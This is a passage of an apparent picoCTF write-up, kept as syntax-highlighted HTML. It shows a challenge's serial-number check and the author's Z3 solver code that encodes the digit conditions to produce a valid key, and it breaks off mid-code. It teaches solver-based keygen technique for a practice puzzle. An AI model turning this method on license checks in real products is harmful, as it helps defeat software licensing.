#ECEFF4;">(</span><span>serial</span><span style="color: #ECEFF4;">[</span><span style="color: #B48EAD;">8</span><span style="color: #ECEFF4;">])</span><span style="color: #81A1C1;"> +</span><span style="color: #88C0D0;"> int</span><span style="color: #ECEFF4;">(</span><span>serial</span><span style="color: #ECEFF4;">[</span><span style="color: #B48EAD;">9</span><span style="color: #ECEFF4;">])</span><span style="color: #81A1C1;"> !=</span><span style="color: #B48EAD;"> 12</span><span style="color: #ECEFF4;">:</span></span> <span class="giallo-l"><span style="color: #81A1C1;"> return False</span></span> <span class="giallo-l"><span style="color: #81A1C1;"> if</span><span style="color: #88C0D0;"> int</span><span style="color: #ECEFF4;">(</span><span>serial</span><span style="color: #ECEFF4;">[</span><span style="color: #B48EAD;">12</span><span style="color: #ECEFF4;">])</span><span style="color: #81A1C1;"> -</span><span style="color: #88C0D0;"> int</span><span style="color: #ECEFF4;">(</span><span>serial</span><span style="color: #ECEFF4;">[</span><span style="color: #B48EAD;">19</span><span style="color: #ECEFF4;">])</span><span style="color: #81A1C1;"> !=</span><span style="color: #B48EAD;"> 1</span><span style="color: #ECEFF4;">:</span></span> <span class="giallo-l"><span style="color: #81A1C1;"> return False</span></span> <span class="giallo-l"><span style="color: #81A1C1;"> if</span><span style="color: #88C0D0;"> int</span><span style="color: #ECEFF4;">(</span><span>serial</span><span style="color: #ECEFF4;">[</span><span style="color: #B48EAD;">9</span><span style="color: #ECEFF4;">])</span><span style="color: #81A1C1;"> %</span><span style="color: #88C0D0;"> int</span><span style="color: #ECEFF4;">(</span><span>serial</span><span style="color: #ECEFF4;">[</span><span style="color: #B48EAD;">17</span><span style="color: #ECEFF4;">])</span><span style="color: #81A1C1;"> !=</span><span style="color: #B48EAD;"> 7</span><span style="color: #ECEFF4;">:</span></span> <span class="giallo-l"><span style="color: #81A1C1;"> return False</span></span> <span class="giallo-l"><span style="color: #81A1C1;"> if</span><span style="color: #88C0D0;"> int</span><span style="color: #ECEFF4;">(</span><span>serial</span><span style="color: #ECEFF4;">[</span><span style="color: #B48EAD;">14</span><span style="color: #ECEFF4;">])</span><span style="color: #81A1C1;"> *</span><span style="color: #88C0D0;"> int</span><span style="color: #ECEFF4;">(</span><span>serial</span><span style="color: #ECEFF4;">[</span><span style="color: #B48EAD;">16</span><span style="color: #ECEFF4;">])</span><span style="color: #81A1C1;"> !=</span><span style="color: #B48EAD;"> 40</span><span style="color: #ECEFF4;">:</span></span> <span class="giallo-l"><span style="color: #81A1C1;"> return False</span></span> <span class="giallo-l"><span style="color: #81A1C1;"> if</span><span style="color: #88C0D0;"> int</span><span style="color: #ECEFF4;">(</span><span>serial</span><span style="color: #ECEFF4;">[</span><span style="color: #B48EAD;">7</span><span style="color: #ECEFF4;">])</span><span style="color: #81A1C1;"> -</span><span style="color: #88C0D0;"> int</span><span style="color: #ECEFF4;">(</span><span>serial</span><span style="color: #ECEFF4;">[</span><span style="color: #B48EAD;">4</span><span style="color: #ECEFF4;">])</span><span style="color: #81A1C1;"> !=</span><span style="color: #B48EAD;"> 1</span><span style="color: #ECEFF4;">:</span></span> <span class="giallo-l"><span style="color: #81A1C1;"> return False</span></span> <span class="giallo-l"><span style="color: #81A1C1;"> if</span><span style="color: #88C0D0;"> int</span><span style="color: #ECEFF4;">(</span><span>serial</span><span style="color: #ECEFF4;">[</span><span style="color: #B48EAD;">6</span><span style="color: #ECEFF4;">])</span><span style="color: #81A1C1;"> +</span><span style="color: #88C0D0;"> int</span><span style="color: #ECEFF4;">(</span><span>serial</span><span style="color: #ECEFF4;">[</span><span style="color: #B48EAD;">0</span><span style="color: #ECEFF4;">])</span><span style="color: #81A1C1;"> !=</span><span style="color: #B48EAD;"> 6</span><span style="color: #ECEFF4;">:</span></span> <span class="giallo-l"><span style="color: #81A1C1;"> return False</span></span> <span class="giallo-l"><span style="color: #81A1C1;"> if</span><span style="color: #88C0D0;"> int</span><span style="color: #ECEFF4;">(</span><span>serial</span><span style="color: #ECEFF4;">[</span><span style="color: #B48EAD;">2</span><span style="color: #ECEFF4;">])</span><span style="color: #81A1C1;"> -</span><span style="color: #88C0D0;"> int</span><span style="color: #ECEFF4;">(</span><span>serial</span><span style="color: #ECEFF4;">[</span><span style="color: #B48EAD;">16</span><span style="color: #ECEFF4;">])</span><span style="color: #81A1C1;"> !=</span><span style="color: #B48EAD;"> 0</span><span style="color: #ECEFF4;">:</span></span> <span class="giallo-l"><span style="color: #81A1C1;"> return False</span></span> <span class="giallo-l"><span style="color: #81A1C1;"> if</span><span style="color: #88C0D0;"> int</span><span style="color: #ECEFF4;">(</span><span>serial</span><span style="color: #ECEFF4;">[</span><span style="color: #B48EAD;">4</span><span style="color: #ECEFF4;">])</span><span style="color: #81A1C1;"> -</span><span style="color: #88C0D0;"> int</span><span style="color: #ECEFF4;">(</span><span>serial</span><span style="color: #ECEFF4;">[</span><span style="color: #B48EAD;">6</span><span style="color: #ECEFF4;">])</span><span style="color: #81A1C1;"> !=</span><span style="color: #B48EAD;"> 1</span><span style="color: #ECEFF4;">:</span></span> <span class="giallo-l"><span style="color: #81A1C1;"> return False</span></span> <span class="giallo-l"><span style="color: #81A1C1;"> if</span><span style="color: #88C0D0;"> int</span><span style="color: #ECEFF4;">(</span><span>serial</span><span style="color: #ECEFF4;">[</span><span style="color: #B48EAD;">0</span><span style="color: #ECEFF4;">])</span><span style="color: #81A1C1;"> %</span><span style="color: #88C0D0;"> int</span><span style="color: #ECEFF4;">(</span><span>serial</span><span style="color: #ECEFF4;">[</span><span style="color: #B48EAD;">5</span><span style="color: #ECEFF4;">])</span><span style="color: #81A1C1;"> !=</span><span style="color: #B48EAD;"> 4</span><span style="color: #ECEFF4;">:</span></span> <span class="giallo-l"><span style="color: #81A1C1;"> return False</span></span> <span class="giallo-l"><span style="color: #81A1C1;"> if</span><span style="color: #88C0D0;"> int</span><span style="color: #ECEFF4;">(</span><span>serial</span><span style="color: #ECEFF4;">[</span><span style="color: #B48EAD;">5</span><span style="color: #ECEFF4;">])</span><span style="color: #81A1C1;"> *</span><span style="color: #88C0D0;"> int</span><span style="color: #ECEFF4;">(</span><span>serial</span><span style="color: #ECEFF4;">[</span><span style="color: #B48EAD;">11</span><span style="color: #ECEFF4;">])</span><span style="color: #81A1C1;"> !=</span><span style="color: #B48EAD;"> 0</span><span style="color: #ECEFF4;">:</span></span> <span class="giallo-l"><span style="color: #81A1C1;"> return False</span></span> <span class="giallo-l"><span style="color: #81A1C1;"> if</span><span style="color: #88C0D0;"> int</span><span style="color: #ECEFF4;">(</span><span>serial</span><span style="color: #ECEFF4;">[</span><span style="color: #B48EAD;">10</span><span style="color: #ECEFF4;">])</span><span style="color: #81A1C1;"> %</span><span style="color: #88C0D0;"> int</span><span style="color: #ECEFF4;">(</span><span>serial</span><span style="color: #ECEFF4;">[</span><span style="color: #B48EAD;">15</span><span style="color: #ECEFF4;">])</span><span style="color: #81A1C1;"> !=</span><span style="color: #B48EAD;"> 2</span><span style="color: #ECEFF4;">:</span></span> <span class="giallo-l"><span style="color: #81A1C1;"> return False</span></span> <span class="giallo-l"><span style="color: #81A1C1;"> if</span><span style="color: #88C0D0;"> int</span><span style="color: #ECEFF4;">(</span><span>serial</span><span style="color: #ECEFF4;">[</span><span style="color: #B48EAD;">11</span><span style="color: #ECEFF4;">])</span><span style="color: #81A1C1;"> /</span><span style="color: #88C0D0;"> int</span><span style="color: #ECEFF4;">(</span><span>serial</span><span style="color: #ECEFF4;">[</span><span style="color: #B48EAD;">3</span><span style="color: #ECEFF4;">])</span><span style="color: #81A1C1;"> !=</span><span style="color: #B48EAD;"> 0</span><span style="color: #ECEFF4;">:</span></span> <span class="giallo-l"><span style="color: #81A1C1;"> return False</span></span> <span class="giallo-l"><span style="color: #81A1C1;"> if</span><span style="color: #88C0D0;"> int</span><span style="color: #ECEFF4;">(</span><span>serial</span><span style="color: #ECEFF4;">[</span><span style="color: #B48EAD;">14</span><span style="color: #ECEFF4;">])</span><span style="color: #81A1C1;"> -</span><span style="color: #88C0D0;"> int</span><span style="color: #ECEFF4;">(</span><span>serial</span><span style="color: #ECEFF4;">[</span><span style="color: #B48EAD;">13</span><span style="color: #ECEFF4;">])</span><span style="color: #81A1C1;"> != -</span><span style="color: #B48EAD;">4</span><span style="color: #ECEFF4;">:</span></span> <span class="giallo-l"><span style="color: #81A1C1;"> return False</span></span> <span class="giallo-l"><span style="color: #81A1C1;"> if</span><span style="color: #88C0D0;"> int</span><span style="color: #ECEFF4;">(</span><span>serial</span><span style="color: #ECEFF4;">[</span><span style="color: #B48EAD;">18</span><span style="color: #ECEFF4;">])</span><span style="color: #81A1C1;"> +</span><span style="color: #88C0D0;"> int</span><span style="color: #ECEFF4;">(</span><span>serial</span><span style="color: #ECEFF4;">[</span><span style="color: #B48EAD;">19</span><span style="color: #ECEFF4;">])</span><span style="color: #81A1C1;"> !=</span><span style="color: #B48EAD;"> 3</span><span style="color: #ECEFF4;">:</span></span> <span class="giallo-l"><span style="color: #81A1C1;"> return False</span></span> <span class="giallo-l"><span style="color: #81A1C1;"> return True</span></span> <span class="giallo-l"><span style="color: #81A1C1;">if</span><span style="color: #88C0D0;"> check_serial</span><span style="color: #ECEFF4;">(</span><span>sys</span><span style="color: #ECEFF4;">.</span><span>argv</span><span style="color: #ECEFF4;">[</span><span style="color: #B48EAD;">1</span><span style="color: #ECEFF4;">]):</span></span> <span class="giallo-l"><span style="color: #88C0D0;"> print</span><span style="color: #ECEFF4;"> (&quot;</span><span style="color: #A3BE8C;">Thank you! Your product has been verified!</span><span style="color: #ECEFF4;">&quot;)</span></span> <span class="giallo-l"><span style="color: #81A1C1;">else</span><span style="color: #ECEFF4;">:</span></span> <span class="giallo-l"><span style="color: #88C0D0;"> print</span><span style="color: #ECEFF4;"> (&quot;</span><span style="color: #A3BE8C;">I&#39;m sorry that is incorrect. Please use a valid RoboCorpIntergalactic serial number</span><span style="color: #ECEFF4;">&quot;)</span></span></code></pre> <p>As we can see the program expects a 20 digits serial and the <code>check_serial()</code> function checks a number of conditions on the values of the digits with simple operations. It probably can be solved by hand but it is a perfect use case for <a rel="nofollow noreferrer external" href="https://github.com/Z3Prover/z3">Z3</a>. In short, Z3 is an open-source theorem prover than allows us to define conditions to be met and will output if the conditions are satisfiable as well a set of values that meet all those conditions. The inner workings of Z3 and SMT solvers are a complex topic but Z3 itself is actually easy to use.</p> <p>I will now go through my solution code, if you prefer to see the full script you can find it <a rel="nofollow noreferrer external" href="https://github.com/ekse/code/blob/master/ctf/picoctf/harderserial/break_serial.py">here</a>. Z3 uses its own syntax but luckily there are Python bindings which will make it easy to define the conditions. We start by importing z3 and defining integer variables for the serial digits.</p> <pre class="giallo" style="color: #D8DEE9; background-color: #2E3440;"><code data-lang="python"><span class="giallo-l"><span style="color: #81A1C1;">from</span><span> z3</span><span style="color: #81A1C1;"> import *</span></span> <span class="giallo-l"><span style="color: #616E88;"># define the variables for the serial</span></span> <span class="giallo-l"><span>s0</span><span style="color: #81A1C1;"> =</span><span style="color: #88C0D0;"> Int</span><span style="color: #ECEFF4;">(&#39;</span><span style="color: #A3BE8C;">s[0]</span><span style="color: #ECEFF4;">&#39;)</span></span> <span class="giallo-l"><span>s1</span><span style="color: #81A1C1;"> =</span><span style="color: #88C0D0;"> Int</span><span style="color: #ECEFF4;">(&#39;</span><span style="color: #A3BE8C;">s[1]</span><span style="color: #ECEFF4;">&#39;)</span></span> <span class="giallo-l"><span>s2</span><span style="color: #81A1C1;"> =</span><span style="color: #88C0D0;"> Int</span><span style="color: #ECEFF4;">(&#39;</span><span style="color: #A3BE8C;">s[2]</span><span style="color: #ECEFF4;">&#39;)</span></span> <span class="giallo-l"><span>s3</span><span style="color: #81A1C1;"> =</span><span style="color: #88C0D0;"> Int</span><span style="color: #ECEFF4;">(&#39;</span><span style="color: #A3BE8C;">s[3]</span><span style="color: #ECEFF4;">&#39;)</span></span> <span class="giallo-l"><span>s4</span><span style="color: #81A1C1;"> =</span><span style="color: #88C0D0;"> Int</span><span style="color: #ECEFF4;">(&#39;</span><span style="color: #A3BE8C;">s[4]</span><span style="color: #ECEFF4;">&#39;)</span></span> <span class="giallo-l"><span>s5</span><span style="color: #81A1C1;"> =</span><span style="color: #88C0D0;"> Int</span><span style="color: #ECEFF4;">(&#39;</span><span style="color: #A3BE8C;">s[5]</span><span style="color: #ECEFF4;">&#39;)</span></span> <span class="giallo-l"><span>s6</span><span style="color: #81A1C1;"> =</span><span style="color: #88C0D0;"> Int</span><span style="color: #ECEFF4;">(&#39;</span><span style="color: #A3BE8C;">s[6]</span><span style="color: #ECEFF4;">&#39;)</span></span> <span class="giallo-l"><span>s7</span><span style="color: #81A1C1;"> =</span><span style="color: #88C0D0;"> Int</span><span style="color: #ECEFF4;">(&#39;</span><span style="color: #A3BE8C;">s[7]</span><span style="color: #ECEFF4;">&#39;)</span></span> <span class="giallo-l"><span>s8</span><span style="color: #81A1C1;"> =</span><span style="color: #88C0D0;"> Int</span><span style="color: #ECEFF4;">(&#39;</span><span style="color: #A3BE8C;">s[8]</span><span style="color: #ECEFF4;">&#39;)</span></span> <span class="giallo-l"><span>s9</span><span style="color: #81A1C1;"> =</span><span style="color: #88C0D0;"> Int</span><span style="color: #ECEFF4;">(&#39;</span><span style="color: #A3BE8C;">s[9]</span><span style="color: #ECEFF4;">&#39;)</span></span> <span class="giallo-l"><span>s10</span><span style="color: #81A1C1;"> =</span><span style="color: #88C0D0;"> Int</span><span style="color: #ECEFF4;">(&#39;</span><span style="color: #A3BE8C;">s[10]</span><span style="color: #ECEFF4;">&#39;)</span></span> <span class="giallo-l"><span>s11</span><span style="color: #81A1C1;"> =</span><span style="color: #88C0D0;"> Int</span><span style="color: #ECEFF4;">(&#39;</span><span style="color: #A3BE8C;">s[11]</span><span style="color: #ECEFF4;">&#39;)</span></span> <span class="giallo-l"><span>s12</span><span style="color: #81A1C1;"> =</span><span style="color: #88C0D0;"> Int</span><span style="color: #ECEFF4;">(&#39;</span><span style="color: #A3BE8C;">s[12]</span><span style="color: #ECEFF4;">&#39;)</span></span> <span class="giallo-l"><span>s13</span><span style="color: #81A1C1;"> =</span><span style="color: #88C0D0;"> Int</span><span style="color: #ECEFF4;">(&#39;</span><span style="color: #A3BE8C;">s[13]</span><span style="color: #ECEFF4;">&#39;)</span></span> <span class="giallo-l"><span>s14</span><span style="color: #81A1C1;"> =</span><span style="color: #88C0D0;"> Int</span><span style="color: #ECEFF4;">(&#39;</span><span style="color: #A3BE8C;">s[14]</span><span style="color: #ECEFF4;">&#39;)</span></span> <span class="giallo-l"><span>s15</span><span style="color: #81A1C1;"> =</span><span style="color: #88C0D0;"> Int</span><span style="color: #ECEFF4;">(&#39;</span><span style="color: #A3BE8C;">s[15]</span><span style="color: #ECEFF4;">&#39;)</span></span> <span class="giallo-l"><span>s16</span><span style="color: #81A1C1;"> =</span><span style="color: #88C0D0;"> Int</span><span style="color: #ECEFF4;">(&#39;</span><span style="color: #A3BE8C;">s[16]</span><span style="color: #ECEFF4;">&#39;)</span></span> <span class="giallo-l"><span>s17</span><span style="color: #81A1C1;"> =</span><span style="color: #88C0D0;"> Int</span><span style="color: #ECEFF4;">(&#39;</span><span style="color: #A3BE8C;">s[17]</span><span style="color: #ECEFF4;">&#39;)</span></span> <span class="giallo-l"><span>s18</span><span style="color: #81A1C1;"> =</span><span style="color: #88C0D0;"> Int</span><span style="color: #ECEFF4;">(&#39;</span><span style="color: #A3BE8C;">s[18]</span><span style="color: #ECEFF4;">&#39;)</span></span> <span class="giallo-l"><span>s19</span><span style="color: #81A1C1;"> =</span><span style="color: #88C0D0;"> Int</span><span style="color: #ECEFF4;">(&#39;</span><span style="color: #A3BE8C;">s[19]</span><span style="color: #ECEFF4;">&#39;)</span></span></code></pre> <p>Then we create an instance of the solver and add our conditions to it. The first set of conditions define the serial digits as values between 0 and 9.</p> <pre class="giallo" style="color: #D8DEE9; background-color: #2E3440;"><code data-lang="python"><span class="giallo-l"><span>solver</span><span style="color: #81A1C1;"> =</span><span style="color: #88C0D0;"> Solver</span><span style="color: #ECEFF4;">()</span></span> <span class="giallo-l"><span style="color: #616E88;"># all serial values are digits between 0 and 9</span></span> <span class="giallo-l"><span>solver</span><span style="color: #ECEFF4;">.</span><span style="color: #88C0D0;">add</span><span style="color: #ECEFF4;">(</span><span>s0</span><span style="color: #81A1C1;"> &gt;=</span><span style="color: #B48EAD;"> 0</span><span style="color: #ECEFF4;">)</span></span> <span class="giallo-l"><span>solver</span><span style="color: #ECEFF4;">.</span><span style="color: #88C0D0;">add</span><span style="color: #ECEFF4;">(</span><span>s1</span><span style="color: #81A1C1;"> &gt;=</span><span style="color: #B48EAD;"> 0</span><span style="color: #ECEFF4;">)</span></span> <span class="giallo-l"><span>solver</span><span style="color: #ECEFF4;">.</span><span style="color: #88C0D0;">add</span><span style="color: #ECEFF4;">(</span><span>s2</span><span style="color: #81A1C1;"> &gt;=</span><span style="color: #B48EAD;"> 0</span><span style="color: #ECEFF4;">)</span></span> <span class="giallo-l"><span>solver</span><span style="color: #ECEFF4;">.</span><span style="color: #88C0D0;">add</span><span style="color: #ECEFF4;">(</span><span>s3</span><span style="color: #81A1C1;"> &gt;=</span><span style="color: #B48EAD;"> 0</span><span style="color: #ECEFF4;">)</span></span> <span class="giallo-l"><span>solver</span><span style="color: #ECEFF4;">.</span><span style="color: #88C0D0;">add</span><span style="color: #ECEFF4;">(</span><span>s4</span><span style="color: #81A1C1;"> &gt;=</span><span style="color: #B48EAD;"> 0</span><span style="color: #ECEFF4;">)</span></span> <span class="giallo-l"><span>solver</span><span style="color: #ECEFF4;">.</span><span style="color: #88C0D0;">add</span><span style="color: #ECEFF4;">(</span><span>s5</span><span style="color: #81A1C1;"> &gt;=</span><span style="color: #B48EAD;"> 0</span><span style="color: #ECEFF4;">)</span></span> <span class="giallo-l"><span>solver</span><span style="color: #ECEFF4;">.</span><span style="color: #88C0D0;">add</span><span style="color: #ECEFF4;">(</span><span>s6</span><span style="color: #81A1C1;"> &gt;=</span><span style="color: #B48EAD;"> 0</span><span style="color: #ECEFF4;">)</span></span> <span class="giallo-l"><span>solver</span><span style="color: #ECEFF4;">.</span><span style="color: #88C0D0;">add</span><span style="color: #ECEFF4;">(</span><span>s7</span><span style="color: #81A1C1;"> &gt;=</span><span style="color: #B48EAD;"> 0</span><span style="color: #ECEFF4;">)</span></span> <span class="giallo-l"><span>solver</span><span style="color: #ECEFF4;">.</span><span style="color: #88C0D0;">add</span><span style="color: #ECEFF4;">(</span><span>s8</span><span style="color: #81A1C1;"> &gt;=</span><span style="color: #B48EAD;"> 0</span><span style="color: #ECEFF4;">)</span></span> <span class="giallo-l"><span>solver</span><span style="color: #ECEFF4;">.</span><span style="color: #88C0D0;">add</span><span style="color: #ECEFF4;">(</span><span>s9</span><span style="color: #81A1C1;"> &gt;=</span><span style="color: #B48EAD;"> 0</span><span style="color: #ECEFF4;">)</span></span> <span class="giallo-l"><span>solver</span><span style="color: #ECEFF4;">.</span><span style="color: #88C0D0;">add</span><span style="color: #ECEFF4;">(</span><span>s10</span><span style="color: #81A1C1;"> &gt;=</span><span style="color: #B48EAD;"> 0</span><span style="color: #ECEFF4;">)</span></span> <span class="giallo-l"><span>solver</span><span style="color: #ECEFF4;">.</span><span style="color: #88C0D0;">add</span><span style="color: #ECEFF4;">(</span><span>s11</span><span style="color: #81A1C1;"> &gt;=</span><span style="color: #B48EAD;"> 0</span><span style="color: #ECEFF4;">)</span></span> <span class="giallo-l"><span>solver</span><span style="color: #ECEFF4;">.</span><span style="color: #88C0D0;">add</span><span style="color: #ECEFF4;">(</span><span>s12</span><span style="color: #81A1C1;"> &gt;=</span><span style="color: #B48EAD;"> 0</span><span style="color: #ECEFF4;">)</span></span> <span class="giallo-l"><span>solver</span><span style="color: #ECEFF4;">.</span><span style="color: #88C0D0;">add</span><span style="color: #ECEFF4;">(</span><span>s13</span><span style="color: #81A1C1;"> &gt;=</span><span style="color: #B48EAD;"> 0</span><span style="color: #ECEFF4;">)</span></span> <span class="giallo-l"><span>solver</span><span style="color: #ECEFF4;">.</span><span style="color: #88C0D0;">add</span><span style="color: #ECEFF4;">(</span><span>s14</span><span style="color: #81A1C1;"> &gt;=</span><span style="color: #B48EAD;"> 0</span><span style="color: #ECEFF4;">)</span></span> <span class="giallo-l"><span>solver</span><span style="color: #ECEFF4;">.</span><span style="color: #88C0D0;">add</span><span style="color: #ECEFF4;">(</span><span>s15</span><span style="color: #81A1C1;"> &gt;=</span><span style="color: #B48EAD;"> 0</span><span style="color: #ECEFF4;">)</span></span> <span class="giallo-l"><span>solver</span><span style="color: #ECEFF4;">.</span><span style="color: #88C0D0;">add</span><span style="color: #ECEFF4;">(</span><span>s16</span><span style="color: #81A1C1;"> &gt;=</span><span style="color: #B48EAD;"> 0</span><span style="color: #ECEFF4;">)</span></span> <span class="giallo-l"><span>solver</span><span style="color: #ECEFF4;">.</span><span style="color: #88C0D0;">add</span><span style="color: #ECEFF4;">(</span><span>s17</span><span style="color: #81A1C1;"> &gt;=</span><span style="color: #B48EAD;"> 0</span><span style="color: #ECEFF4;">)</span></span> <span class="giallo-l"><span>solver</span><span style="color: #ECEFF4;">.</span><span style="color: #88C0D0;">add</span><span style="color: #ECEFF4;">(</span><span>s18</span><span style="color: #81A1C1;"> &gt;=</span><span style="color: #B48EAD;"> 0</span><span style="color: #ECEFF4;">)</span></span> <span class="giallo-l"><span>solver</span><span style="color: #ECEFF4;">.</span><span style="color: #88C0D0;">add</span><span style="color: #ECEFF4;">(</span><span>s19</span><span style="color: #81A1C1;"> &gt;=</span><span style="color: #B48EAD;"> 0</span><span style="color: #ECEFF4;">)</span></span> <span class="giallo-l"><span>solver</span><span style="color: #ECEFF4;">.</span><span style="color: #88C0D0;">add</span><span style="color: #ECEFF4;">(</span><span>s0</span><span style="color: #81A1C1;"> &lt;</span><span style="color: #B48EAD;"> 10</span><span style="color: #ECEFF4;">)</span></span> <span class="giallo-l"><span>solver</span><span style="color: #ECEFF4;">.</span><span style="color: #88C0D0;">add</span><span style="color: #ECEFF4;">(</span><span>s1</span><span style="color: #81A1C1;"> &lt;</span><span style="color: #B48EAD;"> 10</span><span style="color: #ECEFF4;">)</span></span> <span class="giallo-l"><span>solver</span><span style="color: #ECEFF4;">.</span><span style="color: #88C0D0;">add</span><span style="color: #ECEFF4;">(</span><span>s2</span><span style="color: #81A1C1;"> &lt;</span><span style="color: #B48EAD;"> 10</span><span style="color: #ECEFF4;">)</span></span> <span class="giallo-l"><span>solver</span><span style="color: #ECEFF4;">.</span><span style="color: #88C0D0;">add</span><span style="color: #ECEFF4;">(</span><span>s3</span><span style="color: #81A1C1;"> &lt;</span><span style="color: #B48EAD;"> 10</span><span style="color: #ECEFF4;">)</span></span> <span class="giallo-l"><span>solver</span><span style="color: #ECEFF4;">.</span><span style="color: #88C0D0;">add</span><span style="color: #ECEFF4;">(</span><span>s4</span><span style="color: #81A1C1;"> &lt;</span><span style="color: #B48EAD;"> 10</span><span style="color: #ECEFF4;">)</span></span> <span class="giallo-l"><span>solver</span><span style="color: #ECEFF4;">.</span><span style="color: #88C0D0;">add</span><span style="color: #ECEFF4;">(</span><span>s5</span><span style="color: #81A1C1;"> &lt;</span><span style="color: #B48EAD;"> 10</span><span style="color: #ECEFF4;">)</span></span> <span class="giallo-l"><span>solver</span><span style="color: #ECEFF4;">.</span><span style="color: #88C0D0;">add</span><span style="color: #ECEFF4;">(</span><span>s6</span><span style="color: #81A1C1;"> &lt;</span><span style="color: #B48EAD;"> 10</span><span style="color: #ECEFF4;">)</span></span> <span class="giallo-l"><span>solver</span><span style="color: #ECEFF4;">.</span><span style="color: #88C0D0;">add</span><span style="color: #ECEFF4;">(</span><span>s7</span><span style="color: #81A1C1;"> &lt;</span><span style="color: #B48EAD;"> 10</span><span style="color: #ECEFF4;">)</span></span> <span class="giallo-l"><span>solver</span><span style="color: #ECEFF4;">.</span><span style="color: #88C0D0;">add</span><span style="color: #ECEFF4;">(</span><span>s8</span><span style="color: #81A1C1;"> &lt;</span><span style="color: #B48EAD;"> 10</span><span style="color: #ECEFF4;">)</span></span> <span class="giallo-l"><span>solver</span><span style="color: #ECEFF4;">.</span><span style="color: #88C0D0;">add</span><span style="color: #ECEFF4;">(</span><span>s9</span><span style="color: #81A1C1;"> &lt;</span><span style="color: #B48EAD;"> 10</span><span style="color: #ECEFF4;">)</span></span> <span class="giallo-l"><span>solver</span><span style="color: #ECEFF4;">.</span><span style="color: #88C0D0;">add</span><span style="color: #ECEFF4;">(</span><span>s10</span><span style="color: #81A1C1;"> &lt;</span><span style="color: #B48EAD;"> 10</span><span style="color: #ECEFF4;">)</span></span> <span class="giallo-l"><span>solver</span><span style="color: #ECEFF4;">.</span><span style="color: #88C0D0;">add</span><span style="color: #ECEFF4;">(</span><span>s11</span><span style="color: #81A1C1;"> &lt;</span><span style="color: #B48EAD;"> 10</span><span style="color: #ECEFF4;">)</span></span> <span class="giallo-l"><span>solver</span><span style="color: #ECEFF4;">.</span><span style="color: #88C0D0;">add</span><span style="color: #ECEFF4;">(</span><span>s12</span><span style="color: #81A1C1;"> &lt;</span><span style="color: #B48EAD;"> 10</span><span style="color: #ECEFF4;">)</span></span> <span class="giallo-l"><span>solver</span><span style="color: #ECEFF4;">.</span><span style="color: #88C0D0;">add</span><span style="color: #ECEFF4;">(</span><span>s13</span><span style="color: #81A1C1;"> &lt;</span><span style="color: #B48EAD;"> 10</span><span style="color: #ECEFF4;">)</span></span> <span class="giallo-l"><span>solver</span><span style="color: #ECEFF4;">.</span><span style="color: #88C0D0;">add</span><span style="color: #ECEFF4;">(</span><span>s14</span><span style="color: #81A1C1;"> &lt;</span><span style="color: #B48EAD;"> 10</span><span style="color: #ECEFF4;">)</span></span> <span class="giallo-l"><span>solver</span><span style="color: #ECEFF4;">.</span><span style="color: #88C0D0;">add</span><span style="color: #ECEFF4;">(</span><span>s15</span><span style="color: #81A1C1;"> &lt;</span><span style="color: #B48EAD;"> 10</span><span style="color: #ECEFF4;">)</span></span> <span class="giallo-l"><span>solver</span><span style="color: #ECEFF4;">.</span><span style="color: #88C0D0;">add</span><span style="color: #ECEFF4;">(</span><span>s16</span><span style="color: #81A1C1;"> &lt;</span><span style="color: #B48EAD;"> 10</span><span style="color: #ECEFF4;">)</span></span> <span class="giallo-l"><span>solver</span><span style="color: #ECEFF4;">.</span><span style="color: #88C0D0;">add</span><span style="color: #ECEFF4;">(</span><span>s17</span><span style="color: #81A1C1;"> &lt;</span><span style="color: #B48EAD;"> 10</span><span style="color: #ECEFF4;">)</span></span> <span class="giallo-l"><span>solver</span><span style="color: #ECEFF4;">.</span><span style="color: #88C0D0;">add</span><span style="color: #ECEFF4;">(</span><span>s18</span><span style="color: #81A1C1;"> &lt;</span><span style="color: #B48EAD;"> 10</span><span style="color: #ECEFF4;">)</span></span> <span class="giallo-l"><span>solver</span><span style="color: #ECEFF4;">.</span><span style="color: #88C0D0;">add</span><span style="color: #ECEFF4;">(</span><span>s19</span><span style="color: #81A1C1;"> &lt;</span><span style="color: #B48EAD;"> 10</span><span style="color: #ECEFF4;">)</span></span></code></pre> <p>Then we add the conditions from the serial_check() function. To save time I used a couple of search and replace in a text editor to avoid typing them manually.</p> <pre class="giallo" style="color: #D8DEE9; background-color: #2E3440;"><code data-lang="python"><span class="giallo-l"><span style="color: #616E88;"># add serial checking conditions</span></span> <span class="giallo-l"><span>solver</span><span style="color: #ECEFF4;">.</span><span style="color: #88C0D0;">add</span><span style="color: #ECEFF4;">(</span><span>s15</span><span style="color: #81A1C1;"> +</span><span> s4</span><span style="color: #81A1C1;"> ==</span><span style="color: #B48EAD;"> 10</span><span style="color: #ECEFF4;">)</span></span> <span class="giallo-l"><span>solver</span><span style="color: #ECEFF4;">.</span><span style="color: #88C0D0;">add</span><span style="color: #ECEFF4;">(</span><span>s1</span><span style="color: #81A1C1;"> *</span><span> s18</span><span style="color: #81A1C1;"> ==</span><span style="color: #B48EAD;"> 2</span><span style="color: #ECEFF4;"> )</span></span> <span class="giallo-l"><span>solver</span><span style="color: #ECEFF4;">.</span><span style="color: #88C0D0;">add</span><span style="color: #ECEFF4;">(</span><span>s15</span><span style="color: #81A1C1;"> /</span><span> s9</span><span style="color: #81A1C1;"> ==</span><span style="color: #B48EAD;"> 1</span><span style="color: #ECEFF4;">)</span></span> <span class="giallo-l"><span>solver</span><span style="color: #ECEFF4;">.</span><span style="color: #88C0D0;">add</span><span style="color: #ECEFF4;">(</span><span>s17</span><span style="color: #81A1C1;"> -</span><span> s0</span><span style="color: #81A1C1;"> ==</span><span style="color: #B48EAD;"> 4</span><span style="color: #ECEFF4;">)</span></span> <span class="giallo-l"><span>solver</span><span style="color: #ECEFF4;">.</span><span style="color: #88C0D0;">add</span><span style="color: #ECEFF4;">(</span><span>s5</span><span style="color: #81A1C1;"> -</span><span> s17</span><span style="color: #81A1C1;"> == -</span><span style="color: #B48EAD;">1</span><span style="color: #ECEFF4;">)</span></span> <span class="giallo-l"><span>solver</span><span style="color: #ECEFF4;">.</span><span style="color: #88C0D0;">add</span><span style="color: #ECEFF4;">(</span><span>s15</span><span style="color: #81A1C1;"> -</span><span> s1</span><span style="color: #81A1C1;"> ==</span><span style="color: #B48EAD;"> 5</span><span style="color: #ECEFF4;">)</span></span> <span class="giallo-l"><span>solver</span><span style="color: #ECEFF4;">.</span><span style="color: #88C0D0;">add</span><span style="color: #ECEFF4;">(</span><span>s1</span><span style="color: #81A1C1;"> *</span><span> s10</span><span style="color: #81A1C1;"> ==</span><span style="color: #B48EAD;"> 18</span><span style="color: #ECEFF4;">)</span></span> <span class="giallo-l"><span>solver</span><span style="color: 